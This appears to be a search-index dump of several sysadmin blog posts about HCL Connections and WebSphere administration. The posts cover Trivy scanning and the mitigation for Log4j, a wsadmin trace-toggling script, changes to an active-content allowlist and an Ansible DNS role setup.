/opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/ConnectionsCell/ [root@cnx7-was ConnectionsCell]# find . -iname \\*log4j\\* | grep jar | sort ./Activities.ear/oawebui.war/WEB-INF/lib/log4j-1.2.11.jar ./Blogs.ear/blogs.war/WEB-INF/lib/log4j-1.2.11.jar ... File system scanning like here is easy, when you just want to find a library or the used version.\nTrivy A good option for scanning all kinds of vulnerabilities in the file system and within containers is Aquasecurity Trivy licensed under the Apache 2.0 License .\nContainer For HCL Connections, we get all container images of Component Pack within the download package. Here for example, I extracted it to my local file system:\nunzip componentpack-7.0.0.2.zip cd microservices_connections/hybridcloud/images/ mkdir logs for i in $(ls) ; do trivy i -i ${i} -o logs/${i%.tar}.log done This command creates a log-file for each image in the directory and lists all used libraries and their known vulnerabilities.\nSo now we can grep for log4j and will find the Elasticsearch images, which uses log4j-2.11.1.\nI\u0026rsquo;m not sure if a user can trigger something in Componentpack - Elasticsearch, but I edited the statefulsets es-master-7, es-data-7 and the deployment es-client-7. I just added the mentioned JVM option and restarted the pods.\nkubectl edit statefulset es-master-7 kubectl edit statefulset es-data-7 kubectl edit deployment es-client-7 Each of the definitions shows ES_JAVA_OPTS twice:\n- name: ES_JAVA_OPTS value: -Xms512m -Xmx512m in both occurrences add -Dlog4j2.formatMsgNoLookups=True - name: ES_JAVA_OPTS value: -Xms512m -Xmx512m -Dlog4j2.formatMsgNoLookups=True and restart the pods: kubectl rollout restart statefulsets es-data-7 es-master-7 kubectl rollout restart deployment es-client-7 After this check if all applications in Connections are still working, or restart them too.\nFiles System We can use trivy to scan the ear files:\ncd /opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/ConnectionsCell/ mkdir ~/logs for i in $(ls) ; do trivy fs --list-all-pkgs -o ~/logs/${i%%.ear}.log $i done This creates a directory named logs in our home directory, and we can read over all files, or just grep for terms you\u0026rsquo;re interested in.\nYou will see, we get the library name, installed version and if there is a version available where the issue is fixed.\nI don\u0026rsquo;t post any found libraries here, there is a lot to observe and not each critical vulnerability is exploitable in all environments. So you have to read the follow-ups under title and find out if your environment is vulnerable.\nRegistry Trivy can scan images in registries too, I do more like the scanning in the file system, because there I don\u0026rsquo;t need to tame certificates and download the image before.\nSummary I like using trivy, and I learned a lot about containers and libraries since I use it. You can add it to your CI/CD, and development workflow, this can help update libraries more frequently.\nResources https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095490 https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://www.randori.com/blog/cve-2021-44228/ https://github.com/apache/logging-log4j2/pull/608 Other Open Source Tools to scan for libraries in file systems and multi jar levels ","excerpt":"\u003cp\u003e\u003cstrong\u003eUpdate \u003cdel\u003e2021-12-13\u003c/del\u003e 2021-12-15\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\" target=\"_blank\"\u003eElasticsearch: Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0095490\" target=\"_blank\"\u003eHCL: CVE-2021-44228 : Security Advisory \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.ibm.com/support/pages/node/6525706?myns=swgws\u0026amp;mynp=OCSSEQTP\u0026amp;mync=E\u0026amp;cm_sp=swgws-_-OCSSEQTP-_-E\" target=\"_blank\"\u003eIBM: Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0095498\" target=\"_blank\"\u003eSecurity Bulletin: HCL Connections Security Update for Apache Log4j 2 Vulnerability (CVE-2021-44228) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046\" target=\"_blank\"\u003eCVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSo there is a fix for \u003ccode\u003ekc.war\u003c/code\u003e which updates the \u003ccode\u003elog4j\u003c/code\u003e 2.8 to 2.15, Elasticsearch in Component Pack has log4j 2.8 and 2.11 included \u003cdel\u003ebut is not vulnerable because of additional security settings.\u003c/del\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/log4j_how_to_find_out/","title":"Log4j how to find out if an application has it included"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/log4shell/","title":"Log4shell"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/log4shell/","title":"Log4shell"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/security/","title":"Security"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vulnerabilities/","title":"Vulnerabilities"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/debug/","title":"Debug"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/debugging/","title":"Debugging"},{"body":"During troubleshooting of WebSphere Application Server it is necessary to enable traces and see more detailed log messages.\nEnabling these traces is very annoying, because you need to follow long click paths within the Integrated Solution Console (ISC).\nEnable traces within ISC Open WebSphere Application servers overview, click the server name where you want to enable traces Click on Diagnostic trace service Click on Runtime Most of the time it is sufficient to enable traces for the runtime of the application server. So no need to restart the application server, after restart the trace settings are set back to default.\nOpen Change log detail level Add the trace string to text box and click OK or Apply So after 6 or 7 clicks you\u0026rsquo;re ready to \u0026hellip;\ndo the same on the next application server, if you have multiple WebSphere nodes for this environment.\nAfter reproducing the error, you can go the same way and set the text box back to *=info or restart the application server to remove the trace settings. Traces produce a lot of IO and so the performance can be very low during activated trace settings. Disable them as soon as possible.\nEnable and disable traces with wsadmin.sh I found a script to print the cluster members of a WebSphere Cluster and extended it with the documented steps to enable tracing on running WebSphere application servers .\nFollowing script enables traces when you start it with two parameters (Cluster name and the trace string) and disables all traces when it is started with one parameter (Cluster name).\n\u0026#39;\u0026#39;\u0026#39; Enable / disable trace settings for all cluster members Cluster name is passed as first parameter to the script Tracestring is passed as second parameter if Tracestring is empty -\u0026gt; disable trace author: Christoph Stoettner mail: christoph.stoettner@stoeps.de license: Apache 2.0 \u0026#39;\u0026#39;\u0026#39; import sys if len(sys.argv) == 0: print(\u0026#39;\u0026#39;\u0026#39; \\tScript needs at least one parameter: Clustername \\n\\tWhen a second parameter is used, it is interpreted as trace string \\n\\n\\tExample: \\twsadmin.sh -lang jython -f clusterTrace.py InfraCluster \u0026#34;*=info:com.ibm.lconn.news.*=all:com.ibm.lconn.hpnews.*=all\u0026#34; \u0026#39;\u0026#39;\u0026#39;) sys.exit() elif len(sys.argv) == 1: type = \u0026#39;disabled\u0026#39; cluster_name=sys.argv[0] else: cluster_name=sys.argv[0] traces=sys.argv[1] type = \u0026#39;enabled\u0026#39; if type == \u0026#39;enabled\u0026#39;: trace_string=\u0026#39;\u0026#39; for trace in traces.split(\u0026#39;:\u0026#39;): if trace_string==\u0026#39;\u0026#39;: trace_string=trace + \u0026#39;=\u0026#39; + type else: trace_string=trace_string + \u0026#39;:\u0026#39; + trace + \u0026#39;=\u0026#39; + type else: trace_string=\u0026#39;*=info=enabled\u0026#39; cluster_id = AdminConfig.getid(\u0026#34;/ServerCluster:\u0026#34;+cluster_name+\u0026#34;/\u0026#34;) if not cluster_id: raise \u0026#34;Cluster %s does not exist!\u0026#34; % cluster_name member_ids = AdminConfig.showAttribute(cluster_id, \u0026#34;members\u0026#34;) member_ids = member_ids[1:-1] for member_id in member_ids.split(): member_name=AdminConfig.showAttribute(member_id, \u0026#34;memberName\u0026#34;) node_name=AdminConfig.showAttribute(member_id, \u0026#34;nodeName\u0026#34;) # Get TraceServer ID ts=AdminControl.completeObjectName(\u0026#39;type=TraceService,process=\u0026#39;+member_name+\u0026#39;,*\u0026#39;) # Set trace settings try: AdminControl.setAttribute(ts, \u0026#39;traceSpecification\u0026#39;, trace_string) print(\u0026#34;Successfully \u0026#34; + type + \u0026#34; trace on \u0026#34; + node_name + \u0026#39;/\u0026#39; + member_name) except: print(\u0026#34;Error changing trace on \u0026#34; + node_name + \u0026#39;/\u0026#39; + member_name) So to enable the trace string *=info:com.ibm.lconn.news.*=all:com.ibm.lconn.core.services.*=all:com.ibm.lconn.hpnews.*=all on the InfraCluster, run the following command:\nThe following commands expect, that you copied the script in the bin folder within your Deployment Manager profile. cd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -f clusterTrace.py InfraCluster \u0026#34;*=info:com.ibm.lconn.news.*=all:com.ibm.lconn.core.services.*=all:com.ibm.lconn.hpnews.*=all\u0026#34; Now do whatever needs to be done to reproduce your issue.\nTo disable the trace on the InfraCluster, run:\ncd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -f clusterTrace.py InfraCluster Even when the performance of the frontend lags during the activated trace, you can disable it with wsadmin nearly immediately. This saves you time, disk space and several meters of mouse movement.\nResources Download clusterTrace.py Tracing operations using the wsadmin scripting tool Turning traces on and off in servers processes using scripting WebSphere Administration: Finding Cluster Members ","excerpt":"\u003cp\u003eDuring troubleshooting of WebSphere Application Server it is necessary to enable traces and see more detailed log messages.\u003c/p\u003e\n\u003cp\u003eEnabling these traces is very annoying, because you need to follow long click paths within the Integrated Solution Console (ISC).\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/websphere_traces_on_steroids/","title":"Enabling and disabling WebSphere traces on steroids"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/traces/","title":"Traces"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/websphere/","title":"Websphere"},{"body":"During the latest automated deployment of the HCL Connections Desktop Plug-ins for Microsoft™ Windows™ , I had issues activating the Password Save Policy. We wanted to disable the option that users can save passwords.\nThe documentation tells us, that the registry key HKLM\\SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Settings\\Password Save Policy needs to be set to 1 to achieve this.\nSadly this does not work, and I remembered, that I investigated this error already some years ago.\nSetting Password Policy like the documentation describes it The Remember the password checkbox is still active.\nAdministrative Template File ADM When you install the plugins you will find two .adm files to import into the Windows Group Policy editor. For 64-bit Windows use C:\\Program Files (x86)\\HCL\\Connections Desktop Plugins\\IBMConnections64.adm, for the 32-bit version, you need to import C:\\Program Files (x86)\\HCL\\Connections Desktop Plugins\\IBMConnections64.adm. So I checked this file for 64 bit and found the registry key: HKLM\\SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Servers\\Password Save Policy.\nSo there is an additional string Servers in the path.\n229 230 231 232 233 234 235 236 ; Password Save Policy POLICY !!L_PasswordSavePolicy KEYNAME \u0026#34;SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Servers\u0026#34; EXPLAIN !!L_PasswordSavePolicyExplain VALUENAME \u0026#34;Password Save Policy\u0026#34; VALUEON 1 VALUEOFF 0 END POLICY When you set the key in the subfolder Servers it works and the password option is grayed out.\nSave password grayed out, after using the path documented in ADM I sent this to support under ticket number CS0255086, that the documentation needs an update. After waiting three months, I make a note here to keep this in mind and not forget it again. Resources HCL Connections Desktop Plug-ins for Microsoft™ Windows™ Preferences and policies for the HCL Connections Desktop Plug-ins for Microsoft Windows ","excerpt":"\u003cp\u003eDuring the latest automated deployment of the \u003ca href=\"https://help.hcltechsw.com/connections/v7/connectors/enduser/c_files_window_install_ovr.html\" target=\"_blank\"\u003eHCL Connections Desktop Plug-ins for Microsoft™ Windows™ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, I had issues activating the \u003ccode\u003ePassword Save Policy\u003c/code\u003e. We wanted to disable the option that users can save passwords.\u003c/p\u003e\n\u003cp\u003eThe documentation tells us, that the registry key \u003ccode\u003eHKLM\\SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Settings\\Password Save Policy\u003c/code\u003e needs to be set to \u003ccode\u003e1\u003c/code\u003e to achieve this.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/connections_desktop_plugins_password_save_policy/","title":"Connections Desktop Plugins Password Save Policy"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/plugins/","title":"Plugins"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/registry/","title":"Registry"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/community/","title":"Community"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/community/","title":"Community"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/creator/","title":"Creator"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/creator/","title":"Creator"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcl-connections/","title":"Hcl-Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hide/","title":"Hide"},{"body":"Some time ago I got the tip from HCL Support, that the Create Community button will recognize the role community-creator only when the gatekeeper option CATALOG_CARD_UPDATED is set to false.\nThis is working, but I had to complain, that this option activates some code, which loads fonts from a CDN instead of the local Connections deployment.\nFor some customers external download of code, fonts, or styles is an issue and this was already fixed with CATALOG_CARD_UPDATED=true, so I was very surprised, as users complained again, that the Community catalog page is requesting fonts from CDN.\nFinally, HCL offered to add the functionality, that the community create button is only visible when the user has the role Community-creator when CATALOG_CARD_UPDATED is set to true, HCL wrote some more details in the defect article KB0088295 .\nSo when you want fonts only loaded from on premises resources and have a hidden / shown create community button, then you should switch back to CATALOG_CARD_UPDATED=true, after you installed the CFix.70.2110 or the upcoming CFix.65.2111 .\nWhy is loading fonts from CDN not a good idea? A very good summary about this topic was written by Collin M Barret in his article Blocking Web Fonts for Speed and Privacy and there is nothing to add.\nIt is less a security issue, because there were only view vulnerabilities in the context of external web fonts, but we shouldn\u0026rsquo;t forget the privacy concerns. Please read the article for more details.\nResources Defect article KB0088295 Fix list Connections 7 Fix list Connections 6.5 Overview Connections defect articles Blocking Web Fonts for Speed and Privacy ","excerpt":"\u003cp\u003eSome time ago I got the tip from HCL Support, that the \u003ca href=\"https://stoeps.de/posts/2020/community_create_button/\"\u003e\u003ccode\u003eCreate Community\u003c/code\u003e button will recognize the role \u003ccode\u003ecommunity-creator\u003c/code\u003e\u003c/a\u003e\n only when the gatekeeper option \u003ccode\u003eCATALOG_CARD_UPDATED\u003c/code\u003e is set to \u003ccode\u003efalse\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis is working, but I had to complain, that this option activates some code, which loads fonts from a CDN instead of the local Connections deployment.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/hide-community-button-second/","title":"Hiding the Create Community button 2nd"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/communities/","title":"Communities"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/highlights/","title":"Highlights"},{"body":"Connections 7 creates the Community Highlights page automatically and sets it as the start page for new communities.\nThat\u0026rsquo;s configured in the highway service, which is available for administrative users on https://your_connections_url/connections/config/highway.main.gatekeeper.tiles\nOption to set the Highlights page as overview page for new created communities. So far so good, the community menu looks way cleaner, until today I haven\u0026rsquo;t thought about this.\nI started playing around with my new community. The default highlights page looks something like this:\nDefault highlights page after creating a new community Now I added a second richtext widget to it (that\u0026rsquo;s normal for many users, some use rich content as others a blog to announce something):\nNew widget with additional Rich Content No Overview visible, so how shall I add a Rich Content Instance? I asked HCL Support and they explained:\nOverview page could be back by editing the existing community, please follow below steps:\nGo to existing community Click on edit community under Community Actions set start page to overview save and close HCL Support So I started to search. Yes there is an option to enable Overview in the Community settings and when I switch this to anything else than Highlights the Overview page appears in the menu. So it is just hidden.\nk, then I asked for an enhancement request, I don\u0026rsquo;t think we can ask any Community owner to switch the start page for his community just to add the Rich Content widget.\nThe process to add a Rich Content Widget in Highlights if Highlights is the start page and should be the start page after the process:\nAdd Rich Content to highlights Community Actions \u0026gt; Edit Community Switch start page to anything but highlights Save and close Open Overview Community Actions \u0026gt; Add Apps Select Richtext Community Actions \u0026gt; Edit Community Switch start page to anything but highlights Save and close I even tried to Community Actions \u0026gt; Add Apps without having Overview open, this creates Richtext widgets in the Overview (checked when I switched it on), but the widgets in Highlights don\u0026rsquo;t find them! During my tests only Richtext widgets are mapped from Overview to Highlights, if you create them when the Overview is open. In one case when I added two widgets in Highlights first, both widgets show the content of the Richtext Widget in Overview.\nOverview page with three Rich Content widgets, two created from any app and #3 is created during Overview was open Both Rich Content widgets in Highlights show content from #3 So I created an enhancement request, please vote for it , when you think the same.\nUpdate: The enhancement request is no longer available.\n","excerpt":"\u003cp\u003eConnections 7 creates the Community Highlights page automatically and sets it as the start page for new communities.\u003c/p\u003e\n\u003cp\u003eThat\u0026rsquo;s configured in the highway service, which is available for administrative users on https://\u003cem\u003eyour_connections_url\u003c/em\u003e/connections/config/highway.main.gatekeeper.tiles\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/highlight-as-startpage-hides-overview/","title":"Highlights as start page hides the Community overview"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hightlights/","title":"Hightlights"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/startpage/","title":"Startpage"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/xcc/","title":"Xcc"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/allowlist/","title":"Allowlist"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/allowlist/","title":"Allowlist"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/blocklist/","title":"Blocklist"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/blocklist/","title":"Blocklist"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/customization/","title":"Customization"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/customization/","title":"Customization"},{"body":"A long time ago, I wrote about the new implementation of allowlists in HCL Connections and that the documentation on customization and adding new rules was an absolute miracle for me.\nI haven\u0026rsquo;t implemented allowlists at any customer at the moment, because the first tries in 2018 were horrible. Even formats from the builtin editors got deleted during the save procedure. During test deployments I often start with enabled allowlists, but later I always switch back to blocklists.\nFor a support ticket I had to check some settings today, and so I tried with enabled allowlist and blocklist. This let me remember the old blog post and I wanted to check if custom rules can be added now.\nAllow \u0026lt;style\u0026gt; Some environments allow formatting with style tags in the HTML source of documents. So this is the starting point, how can we allow \u0026lt;style\u0026gt;.\nLet\u0026rsquo;s follow the official documentation Configuring active content filters first.\nLocate the ojhs-whitelist-default.xml Just as a hint: all block- and allowlists are stored in /opt/IBM/WebSpere/AppServer/profiles/Dmgr01/config/cells/cellname/LotusConnections-config/extern when you use a default deployment or Connections Automation Ansible Script .\nCopy files I decided to name my allowlist stoeps.\ncd /opt/IBM/WebSpere/AppServer/profiles/Dmgr01/config/cells/cellname/LotusConnections-config/extern cp ojhs-whitelist-default.xml ojhs-whitelist-stoeps cp acp-configkey__default.xml acp-configkey__stoeps.xml Now edit the copied files and change following lines:\nacp-configkey__stoeps.xml sed -i \u0026#39;s/defaultKey=default/defaultKey=stoeps/g\u0026#39; acp-configkey__stoeps.xml ojhs-whitelist-stoeps.xml Here I replaced the watsonworkspace protocol with the file-protocol, and added the \u0026lt;style\u0026gt; tag.\nIn case of style this is not enough, because we need to allow text between the tags:\n\u0026lt;!-- Allow text within style tag --\u0026gt; \u0026lt;allowTextIn\u0026gt; \u0026lt;element name=\u0026#34;style\u0026#34;/\u0026gt; \u0026lt;/allowTextIn\u0026gt; Here the diff of the original file and my customized one -- ojhs-whitelist-default.xml\t2021-11-10 14:28:04.191941833 +0100 +++ ojhs-whitelist-stoeps.xml\t2021-11-17 12:11:42.336626537 +0100 @@ -1,4 +1,4 @@ -\u0026lt;whitelist id=\u0026#34;Default\u0026#34; +\u0026lt;whitelist id=\u0026#34;stoeps\u0026#34; xmlns=\u0026#34;http://www.ibm.com/connections/acf/ojhs/whitelist/1.0\u0026#34; xmlns:tns=\u0026#34;http://www.ibm.com/connections/acf/ojhs/whitelist/1.0\u0026#34; xmlns:xsi=\u0026#34;http://www.w3.org/2001/XMLSchema-instance\u0026#34; @@ -115,12 +115,13 @@ \u0026lt;element name=\u0026#34;dir\u0026#34;/\u0026gt; \u0026lt;element name=\u0026#34;noembed\u0026#34;/\u0026gt; \u0026lt;element name=\u0026#34;xmp\u0026#34;/\u0026gt; +\t\u0026lt;element name=\u0026#34;style\u0026#34;/\u0026gt; \u0026lt;/allowElements\u0026gt; \u0026lt;allowUrlProtocols\u0026gt; \u0026lt;protocol name=\u0026#34;ftp\u0026#34; /\u0026gt; \u0026lt;protocol name=\u0026#34;tel\u0026#34; /\u0026gt; \u0026lt;protocol name=\u0026#34;notes\u0026#34; /\u0026gt; -\t\u0026lt;protocol name=\u0026#34;watsonworkspace\u0026#34; /\u0026gt; +\t\u0026lt;protocol name=\u0026#34;file\u0026#34; /\u0026gt; \u0026lt;/allowUrlProtocols\u0026gt; @@ -905,5 +908,10 @@ \u0026lt;elementAttribute name=\u0026#34;dir\u0026#34; val=\u0026#34;ltr\u0026#34;/\u0026gt; \u0026lt;/transformElements\u0026gt; --\u0026gt; +\t\u0026lt;!-- Allow text within style tag --\u0026gt; +\t\u0026lt;allowTextIn\u0026gt; +\t\u0026lt;element name=\u0026#34;style\u0026#34;/\u0026gt; +\t\u0026lt;/allowTextIn\u0026gt; To activate the allowlist we need to edit LotusConnections-config.xml and replace all occurrences of acp-configkey__default.xml with acp-configkey__stoeps.xml.\nI couldn\u0026rsquo;t find a way to allow only specific elements within the style-tag. So allowing style with allowTextIn allows all CSS .\nBest way to edit LotusConnections-config.xml is checking out and in, so you get syntax validation. In the article Using the Profiles database as the user directory are these steps explained.\nFinally synchronize the nodes and restart all Connections Clusters.\nTesting I did some tests before I added the new rules. So I could add following code to a richtext widget on the overview page (or highlights).\n\u0026lt;style type=\u0026#34;text/css\u0026#34;\u0026gt; .someclass { color: white !important; background-color: blue; font-weight: bold; } .wheader, widgetTitle { background-color: lightblue; font-weight: bold; } \u0026lt;/style\u0026gt; \u0026lt;p dir=\u0026#34;ltr\u0026#34; style=\u0026#34;color:blue;background-color:yellow;font-weight:bold;float:right;font-size:2em;padding:5px;margin:2px;margin-top:20px;margin-bottom:20px\u0026#34;\u0026gt;Test with style attribute within the p tag.\u0026lt;/p\u0026gt; \u0026lt;p class=\u0026#34;someclass\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt;Test with a class name.\u0026lt;/p\u0026gt; \u0026lt;p dir=\u0026#34;ltr\u0026#34;\u0026gt;Additionally added css style to change background-color of widget title.\u0026lt;/p\u0026gt; With default allowlist, the following code is stored:\n\u0026lt;p style=\u0026#34;background-color:blue;color:green\u0026#34;\u0026gt;Testing some code\u0026lt;/p\u0026gt; \u0026lt;p class=\u0026#34;aaa\u0026#34;\u0026gt;Testing some code\u0026lt;/p\u0026gt; To enable the style= attribute, have a look at Styling rules . The documentation tells us, that we have to enable this, but during my test with the default allowlist, styles were allowed. I doublechecked and in the default list it is already enabled. Style attributes are only styling the tag they are set in, so you can\u0026rsquo;t screw up the whole page.\nActivate the customized allowlist and try again After activation, the code is saved without changes, and so we can see the possible issue of allowing styles in user documents.\nSaved richtext widget with code to change element all over the page You see the users are able to change the color of the whole page (in this case the header background in Highlights). Not a big issue when they only change colors, but I already had users changing and hiding major parts of the connections overview page, so it can happen that they break widgets!\nBe very careful when you enable additional elements, or you allow possible XSS vectors or JavaScript at all.\nFun with CSS - Hide a widget Now I add display:none to hide the description widget. I use the aria-label to select the description widget here.\ndiv[aria-label=\u0026#34;description\u0026#34;] {display:none;} Description widget div has aria-label=description, so adding css to hide it here Here you see the saved code and the missing widget on the right side. Imagine you hide the RTE widget, so you need some knowledge to get the code changed. A cool way to customize a community, but this opens the door for a lot of missuse from user side, but it is definitly easier to achieve than adding themes to communities.\nTo-do and summary Activating allowlists in environments which were deployed before 6.0 can be a challenge, because you don\u0026rsquo;t know which protocols, or tags are used.\nWhy is this a problem?\nSo if users open documents that have been saved with active blocklists, the allowlist may be more restrictive and delete some of the content. This can only be styles, so that the document simply looks different, but links can also be deleted because the protocols are not explicitly allowed.\nThe reason for this is the different philosophy of blocklists and allowlists, so in blocklists everything is allowed what is not listed. Allowlists reverse this approach, they only permit content maintained in the list. So if you forget an element, it will be removed during save.\nOn the other hand the allowlist is a decent way to increase the security, because it prevents user from storing possible malicious code.\nSo my to-do is digging into the databases and build a script to find all used tags and protocols. As a bonus question I\u0026rsquo;m highly interested to allow the style tag, but allow only some special css rules within this tag.\n","excerpt":"\u003cp\u003eA long time ago, I wrote \u003ca href=\"https://stoeps.de/posts/2018/ibm-connections-6-0cr1-allowlisting-css-and-wiki-toc/\"\u003eabout the new implementation of allowlists in HCL Connections\u003c/a\u003e\n and that the documentation on customization and adding new rules was an absolute miracle for me.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/hcl-connections-switch-to-allowlists/","title":"HCL Connections switch to allowlists"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ansible/","title":"Ansible"},{"body":"In the post Create A Test Environment with Terraform and KVM I created the first three virtual machines, now we configure a DNS server so name resolution works as expected.\nSince HCL Connections started to add Kubernetes to the stack, we need to use proper name resolution instead of just editing /etc/hosts. That\u0026rsquo;s a bit of an effort, but in the end it is way easier than checking several hosts if the hosts file is uptodate.\nClone example repository git clone https://github.com/stoeps13/ansible-pb-infra-demo.git cd ansible-pb-infra-demo Adjust to your environment ansible.cfg Here only the uncommented parts of the file.\n1 2 3 4 5 6 [defaults] inventory = environments/libvirt/cnx.ini roles_path = ./roles:~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles stdout_callback = yaml stderr_callback = debug remote_user = ansible It sets the default inventory, and the roles path. Additionally I set my remote user, which I had configured in my Terraform project before.\nenvironments/libvirt/cnx.ini For this installation the DNS server is enough, but I already added groups for LDAP and NFS.\n1 2 3 4 5 6 7 8 [dns] cnx-ns.stoeps.home [nfs] cnx-nfs.stoeps.home [ldap] cnx-ds.stoeps.home environments/libvirt/group_vars/dns.yml --- # The port to listen on. dns_port: 53 # Should the DNS server be a caching DNS server? dns_caching_dns: yes dns_options_forwarders: - 1.1.1.1 - 8.8.8.8 # A list of zones and properties per zone. dns_zones: - name: localhost soa: localhost serial: 1 refresh: 604800 retry: 86400 expire: 2419200 ttl: 604800 records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: \u0026#34;@\u0026#34; value: 127.0.0.1 - name: \u0026#34;@\u0026#34; type: AAAA value: ::1 - name: 127.in-addr.arpa ttl: 604800 records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: 1.0.0 type: PTR value: localhost. - name: 0.in-addr.arpa records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: 255.in-addr.arpa records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: stoeps.home ttl: 604800 ns: - name: cnx-ns.stoeps.home. mx: - name: cnx-mail.stoeps.home. priority: 10 records: - name: cnx-ns value: 10.0.22.2 - name: cnx-nfs value: 10.0.22.3 - name: cnx-ds value: 10.0.22.4 dns_options_listen_on: - any dns_options_listen_on_v6: - any dns_pid_file: /run/named/named.pid I highlighted the most important parts, the dns forwarders which are used to resolve hostnames outside my local zone and the definition of stoeps.home which is the domain I use for my demo environment and the dns records for the first three hosts which we created with Terraform.\nFind and download roles In requirements.yml we just add all roles from https://galaxy.ansible.com which we want to use for our playbook. I decided to use https://galaxy.ansible.com/robertdebock/dns which supports all major Linux distributions.\nrequirements.yml # from galaxy: - src: robertdebock.dns version: 3.1.0 Example requirements https://docs.ansible.com/ansible/latest/galaxy/user_guide.html#installing-multiple-roles-from-a-file explains the different options to import roles. From galaxy, git, using the newest version or just a special branch.\nThe usage of versions has the advantage, that you can test your playbook with a special version, and you can stick with it, until you need to update or change something. So a role update won\u0026rsquo;t break your entire playbook.\n# from galaxy - name: yatesr.timezone # from locally cloned git repository (git+file:// requires full paths) - src: git+file:///home/bennojoy/nginx # from GitHub - src: https://github.com/bennojoy/nginx # from GitHub, overriding the name and specifying a specific tag - name: nginx_role src: https://github.com/bennojoy/nginx version: main This block was only for information, that you see what\u0026rsquo;s possible in a requirements.yml file.\nansible-galaxy install -r requirements.yml This imports the role which will install and configure bind and stores it into the subfolder roles.\nPlaybooks playbooks/dns.yml Within playbooks I create the different playbooks to import for example dns. So with this playbook everything is configured and installed to run dns.\n--- - hosts: dns become: yes roles: - robertdebock.dns This runs the playbook robertdebock.dns on all hosts in the group dns.\nsite.yml If there are multiple playbooks in playbooks, I just include these into site.yml, so I can run all defined playbooks of this repository in one step.\nImagine a second file playbooks/ldap.yml which is also included into site.yml.\n--- - name: Install bind import_playbook: playbooks/dns.yml So our folder looks like this:\n├──  environments │ └──  libvirt │ ├──  group_vars │ │ ├──  dns.yml │ └──  cnx.ini ├──  playbooks │ └──  dns.yml ├──  roles │ ├──  robertdebock.dns │ │ ├──  defaults │ │ │ └──  main.yml │ │ ├──  files │ │ │ └──  override.conf │ │ ├──  handlers │ │ │ └──  main.yml │ │ ├──  meta │ │ │ ├──  exception.yml │ │ │ ├──  main.yml │ │ │ └──  